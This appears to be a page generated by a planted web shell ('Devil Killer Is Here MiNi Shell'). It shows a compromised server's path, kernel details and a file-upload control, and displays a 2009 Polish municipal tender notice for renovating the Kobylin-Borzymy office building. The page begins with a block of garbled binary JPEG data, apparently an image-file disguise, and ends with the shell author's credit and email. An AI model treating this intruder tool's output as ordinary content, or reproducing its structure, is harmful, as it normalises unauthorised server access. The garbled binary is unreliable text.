JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090504/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090504/131206-N-2009.html

<p class="kh_header"><b>Kobylin-Borzymy: Remont pomieszczeń budynku Urzędu Gminy przy ul. Głównej 11 w Kobylinie-Borzymy</b><br>
<b>Numer ogłoszenia: 131206 - 2009; data zamieszczenia: 04.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Kobylin-Borzymy , ul. Główna 11, 18-204 Kobylin-Borzymy, woj. podlaskie, tel. 086 2743003, 2743026, faks 086 2743003.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kobylinborzymy.biuletyn.net</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont pomieszczeń budynku Urzędu Gminy przy ul. Głównej 11 w Kobylinie-Borzymy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: Remont pomieszczeń budynku Urzędu Gminy zlokalizowanego w miejscowości  Kobylin - Borzymy ul. Główna 11 .
Charakterystyka obiektu:
1. Powierzchnia użytkowa - 470,25 m2
2. powierzchnia zabudowy-250,63m2
3. kubatura -2 606,50 m3.
Budynek jest zrealizowany w technologii tradycyjnej  podpiwniczony 2- piętrowy, po termomodernizacji przeprowadzonej w 2008r ( ocieplenie ścian z wyprawą elewacyjną ,wymianą stolarki okiennej i drzwiowej zewnętrznej, ociepleniem stropodachu granulatem z wełny mineralnej z wymianą pokrycia z papy termozgrzewalnej, wykonaniem nowej instalacji c.o. wykonaniem kotłowni olejowej ).

I. zakres do realizacji remontu Budynku Urzędu Gminy 
Zakres remontu pomieszczeń wewnętrznych  w poziomie  piwnic :  
1-skucie istniejących posadzek i podkładów w szatni; korytarzu i Sali konferencyjnej-83,12 m2
2-wykonanie nowych  podkładów z izolacją p.wilgotnościową i cieplną i  posadzek z gresu -83,12m2
3-skucie istniejących tynków w pomieszczeniach po kotłowni i wykonanie nowych tynków-66,25m2
4-poszerzenie otworów drzwiowych, i zamurowanie otworów drzwiowych
5- wyburzenie części  ścian działowych i  wybudowanie nowych ścian 
6- wykonanie szpachlowania ( korytarz i sala konferencyjna) i malowania ścian  
7-demontaż istniejącej stolarki i drzwiowej i montaż nowej stolarki  drzwiowej.

Zakres remontu pomieszczeń wewnętrznych  w poziomie  parteru :  
1-skucie istniejących posadzek i podłoży z usunięciem gruzu i wbudowaniem styropianu- -86,05 m2
2-wykonanie nowych podłoży betonowych wzmocnionych siatką Rabitza z izolacją p.wilgotnościową i cieplną -86,05m2
3- wykonanie nowych posadzek z wykładziny dywanowej supełkowej biurowej
4-poszerzenie otworów drzwiowych, zamurowania otworów drzwiowych
5- wyburzenie części  ścian działowych w pomieszczeniach WC i  wybudowanie nowych ścian  w WC i pokoju biurowym
6- skucie istniejących okładzin ściennych w WC i wykonanie nowych  okładzin z glazury
7- wykonanie szpachlowania  i malowania ścian  farbą lateksową - 160,55 m2
8-demontaż istniejącej stolarki i drzwiowej i montaż nowej stolarki  drzwiowej.

Zakres remontu pomieszczeń wewnętrznych  w poziomie I  piętra  o pow użytkowej-181,69m2:  
1-skucie istniejących posadzek i podłoży z usunięciem gruzu i wbudowaniem styropianu
2-wykonanie nowych podłoży betonowych wzmocnionych siatką Rabitza z izolacją p.wilgotnościową i cieplną 
3- wykonanie nowych posadzek z wykładziny dywanowej supełkowej biurowej i flotex
4-poszerzenie otworów drzwiowych i przejścia w korytarzu, zamurowania otworów drzwiowych
5- wyburzenie części  ścian działowych w pomieszczeniach WC i  wybudowanie nowych ścian  
6- skucie istniejących okładzin ściennych w WC i wykonanie nowych  okładzin z glazury

7- wykonanie szpachlowania  i malowania ścian  - 336,18m2
8-demontaż istniejącej stolarki i drzwiowej i montaż nowej stolarki  drzwiowej.

Roboty dla całości pomieszczeń budynku Urzędu Gminy:

9-  demontaż i wykonanie nowej instalacji wod-kan w budynku

10- demontaż i  wykonanie nowej  instalacji elektrycznej i nagłośnienia
11- remont klatki schodowej z wykonaniem nowej balustrady szpachlowaniem i malowaniem ścian oraz wykonaniem nowych okładzin schodów.


  II zakres do realizacji remont pomieszczeń biblioteki mieszczących się na parterze w zakresie:

Zakres remontu pomieszczeń wewnętrznych Biblioteki :  
1-skucie istniejących posadzek i podłoży z usunięciem gruzu wbudowaniem styropianu- -58,83 m2
2-wykonanie nowych podłoży betonowych wzmocnionych siatką Rabitza z izolacją p.wilgotnościową i cieplną -58,83m2
3- wykonanie nowych posadzek z wykładziny dywanowej supełkowej biurowej
4-poszerzenie otworów drzwiowych, zamurowania otworów drzwiowych -2 szt
5-  wykonanie szpachlowania  i malowania ścian  farbą lateksową - 144,29 m2
8-demontaż istniejącej stolarki i drzwiowej i montaż nowej stolarki  drzwiowej -2 szt

                
	Przedmiot zamówienia należy wykonać z materiałów, określonych w dokumentacji technicznej -PT konstrukcyjny -Artech E.Wojno z Zambrowa; Aranżacja wnętrz opracowanej przez mgr inż. architekt Grażynę Podedworną  z Łomży, mgr inż. Marka Sobieszuka PT - Instalacje wewnętrzne wodno-kanalizacyjne z Łomży , inż. Wacława Mojkowskiego  PT Branża elektryczna , i na podstawie PT remontu budynku wg inwentaryzacji pomieszczeń  wykonanej przez mgr inż. Annę Armista z Łomży przedstawionej na rzutach PT ocieplenia budynku opr. przez dr Wiesława Sarosieka z Białegostoku..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.21.00.00-2, 45.45.30.00-7, 45.32.00.00-6, 45.33.00.00-9, 45.31.00.00-3, 45.42.10.00-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.Wykonawca wnosi wadium w wysokości: 10 000,00 zł. 
Wadium wnosi się przed upływem terminu składania ofert, tj. najpóźniej do 28.05.2009r do godz. 11:00 . 
2.Wadium musi obejmować okres związania ofertą. 
3.Wadium może być wnoszone w jednej lub kilku następujących formach: 
1)  pieniądzu, 
2)poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)  gwarancjach bankowych, 
4)  gwarancjach ubezpieczeniowych, 
5) poręczeniach udzielanych przez podmioty , o których mowa w art. 6b ust. 5 pkt 2 ustawy  z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości ( Dz. U. Nr 109, poz. 1158  z późn. zm.)
5.Wadium wnoszone w pieniądzu należy wpłacić przelewem  na konto Urzędu Gminy  nr konta: 04 8775 0009 0030 0300 0198 0003.

6.Wadium wnoszone w pieniądzu powinno wpłynąć na rachunek bankowy Zamawiającego przed upływem składania ofert.
7.Wadium wnoszone w pozostałych formach  należy dołączyć w oryginale do oferty. 
8. Wadium wnoszone w gwarancjach ubezpieczeniowych, poręczeniach , gwarancjach bankowych i poręczeniach określonych w punkcie 5 nie może zawierać żadnych warunków do spełnienia przez Zamawiającego, oprócz przewidzianych ustawą Prawo zamówień publicznych. Powyższe wadium musi być wpłacone na konto Zamawiającego w terminie 14 dni od daty dostarczenia pisemnego żądania zapłaty, zawierającego oświadczenie sporządzone na podstawie art. 46 ust. 5  ustawy .
9. Wykonawca, którego oferta została wybrana traci wadium wraz z odsetkami na rzecz Zamawiającego w przypadku gdy:
1) odmówi podpisania umowy na warunkach określonych w ofercie
2) nie wniósł zabezpieczenia należytego wykonania umowy
3) zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy .
10.Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, nie złożył dokumentów, o których mowa w art. 25 ust. 1, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn  nieleżących po jego stronie.
11.Wykonawcy biorący udział w przetargu otrzymują zwrot wadium na warunkach określonych w art.46 Ustawy .
12.Wykonawcę, który wniesie wadium w pieniądzu prosimy o podanie nr rachunku bankowego, na który należy zwrócić wniesione wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy: 
1) Posiadają  uprawnienia  do  wykonywania określonej działalności lub czynności w zakresie objętym zamówieniem, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
2) Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
3) Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
4) Nie podlegają wykluczeniu z postępowania na podstawie art.24.ustawy.

- Na potwierdzenie spełniania ww. warunków Zamawiający wymaga złożenia przez Wykonawców pisemnych oświadczeń i dokumentów, określonych w pkt. 6.1  SIWZ.  
- Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na podstawie oświadczeń dokumentów, dostarczonych przez Wykonawców wg formuły spełnia - nie spełnia. Niespełnienie chociażby jednego warunku skutkować będzie wykluczeniem Wykonawcy z postępowania. Ofertę Wykonawcy wykluczonego uznaje się za odrzuconą.
- Ocena spełniania warunków udziału w postępowaniu przez podmiot oferty wspólnej (konsorcjum) będzie dokonana na podstawie dokumentów dołączonych do oferty, które są wymagane od podmiotu wiodącego i każdego uczestnika konsorcjum (szczegółowo wymienione w pkt. 6.1). Ocena spełniania posiadania niezbędnego potencjału ekonomicznego oraz dysponowania potencjałem technicznym oraz osobami, zdolnymi do wykonania zamówienia będzie dokonana po zsumowaniu potencjałów ekonomicznego i technicznego uczestników konsorcjum oraz osób personelu kierowniczego przewidzianych do uczestnictwa w wykonaniu zamówienia, którymi dysponują łącznie uczestnicy konsorcjum. W przypadku oceny posiadania przez wykonawcę niezbędnej wiedzy i doświadczenia konieczne jest, aby przynajmniej jeden z uczestników  konsorcjum spełnił to wymaganie. 

2.Wykonawca, ubiegający się o udzielenie zamówienia, zobowiązany jest
spełniać i akceptować warunki niniejszej SIWZ - pod  rygorem odrzucenia oferty, a w szczególności: 
1)Wypełnić druk OFERTA  który należy sporządzić ściśle wg wzoru druku, załączonego przez Zamawiającego - załącznik nr 1 do SIWZ
2)Dołączyć wszystkie dokumenty wyszczególnione w pkt.6 SIWZ.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia spełniania warunków udziału w postępowaniu, określonych w pkt.5.1 SIWZ,  Wykonawca składa - wraz z ofertą, sporządzoną wg załącznika nr 1 do SIWZ - następujące dokumenty, oświadczenia i informacje:

1) Oświadczenie o spełnianiu warunków udziału w postępowaniu o zamówienie publiczne z art. 22 ust. 1  ustawy z wykorzystaniem wzoru (załącznik nr 2 do SIWZ);

W celu potwierdzenia warunków posiadania uprawnień do wykonywania określonej działalności lub czynności oraz nie podlegania wykluczeniu z postępowania o udzielenie zamówienia publicznego:

2) Aktualny odpis z właściwego rejestru lub aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej, niż 6 miesięcy przed upływem terminu składania ofert - złożone w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez Wykonawcę;
3) Aktualne zaświadczenia właściwego naczelnika urzędu skarbowego, potwierdzające, że Wykonawca nie zalega z opłacaniem podatków, opłat lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej, niż 3 miesiące przed upływem terminu składania ofert - złożone w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez Wykonawcę;
4) Aktualne zaświadczenia właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenie społeczne lub zdrowotne lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej, niż 3 miesiące przed upływem terminu składania ofert - złożone w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez Wykonawcę; 

W celu potwierdzenia warunku posiadania niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia publicznego:

5) Wykaz wykonanych robót budowlanych w ciągu ostatnich pięciu lat przed rozpoczęciem postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 3 robót budowlanych, stanowiących przedmiot zamówienia( wykonanie remontu  budynków użyteczności publicznej, budynkach mieszkalnych w zakresie robót budowlanych i instalacji wod-kan, elektrycznych,  itp. ) z których co najmniej 1 jest o wartości nie mniejszej  200 000,0zł oraz dołączy dokumenty (np. referencje) - w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez Wykonawcę- potwierdzające, że zamówienia te  zostały wykonane należycie sporządzony zgodnie z załącznikiem nr 3 do SIWZ.
6) Wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń, jakimi dysponuje lub będzie dysponował Wykonawca, t.j .sporządzoną zgodnie z załącznikiem nr 4 do SIWZ informację, że wyposażenie techniczne pozwoli na realizację zamówienia.
7) Pisemne zobowiązania innych podmiotów do udostępnienia niezbędnych do wykonania zamówienia narzędzi i urządzeń, jeżeli w wykazie, o którym mowa w pkt 6.6 ; wykonawca wskazał narzędzia i urządzenia, którymi będzie dysponował.
8) Wykaz osób ( personelu kierowniczego), którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonaniu zamówienia wraz z informacjami na temat ich kwalifikacji i doświadczenia niezbędnych do wykonania zamówienia, a także proponowanego zakresu obowiązków w przedmiotowym zamówieniu; kierownik robót budowlanych, sanitarnych i elektrycznych  musi mieć uprawnienia do kierowania robotami będącymi przedmiotem zamówienia i doświadczenie min. 3 lata na podobnym stanowisku , sporządzony zgodnie z załącznikiem nr 5 do SIWZ.
9) Pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w pkt 6.8 ; Wykonawca wskazał osoby, którymi będzie dysponował.
10)  Dokumenty stwierdzające, że osoby, które będą kierować robotami przy realizacji zamówienia w branży budowlanej  posiadają wymagane uprawnienia -  należy dołączyć kserokopie uprawnień budowlanych, sanitarnych i elektrycznych  i zaświadczenie o przynależności do właściwej izby samorządu zawodowego, poświadczone za zgodność z oryginałem przez Wykonawcę.
W celu potwierdzenia warunku znajdowania się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia publicznego:
11) Informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w którym Wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy na kwotę nie mniejszą niż 300 000,0 zł, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert- złożone w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem  przez Wykonawcę;

12) Polisę, a w przypadku jej braku inny dokument ubezpieczenia potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę nie mniejszą niż  300 000 zł, tj. kwotę odszkodowania, jaką gwarantuje ubezpieczyciel. W przypadku załączników do dokumentu lub odniesienia jego treści do innych dokumentów muszą być dostarczone wszystkie dokumenty, na podstawie których możliwa będzie jednoznaczna ocena dokumentu, potwierdzającego wymagane ubezpieczenie - złożone w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez Wykonawcę;

2.  Pozostałe wymagane dokumenty jako załączniki do oferty
1)Kalkulację ceny oferty opracowaną na podstawie dokumentacji technicznej STT i przedmiarów robót  zgodnie z załącznikiem nr 7.
2)Kosztorys szczegółowy  jako materiał pomocniczy do rozliczenia robót
3) Harmonogram prac 
4)Dokument stwierdzający dokonanie wpłaty wadium. Potwierdzenie wpłaty            w pieniądzu oraz inne dokumenty podlegające zwrotowi (np. gwarancje ubezpieczeniowe) należy wpiąć w formie kserokopii poświadczonej za zgodność z oryginałem przez osobę uprawnioną do reprezentowania firmy. Oryginały dokumentów (oprócz przelewów bankowych)  należy załączyć do oferty bez trwałego ich spięcia z pozostałymi dokumentami oferty.
5)W przypadku  zatrudnienia podwykonawcy przy  realizacji  zamówienia, wskazanie rzeczowego i finansowego zakresu prac, które podwykonawca będzie wykonywał dla wykonawcy..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.kobylinborzymy.biuletyn.net.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikacje istotnych warunków zamówienia można pobrać bezpłatnie ze strony internetowej lub uzyskać w siedzibie zamawiajacego pok. nr 11..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.05.2009 godzina 11:00, miejsce: Oferty należy składać  w siedzibie Zamawiającego, adres:
Urząd Gminy  Kobylin Borzymy,
 ul. Główna 11 
18-204 Kobylin Borzymy
pokoju nr 10  (sekretariat) I piętro.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com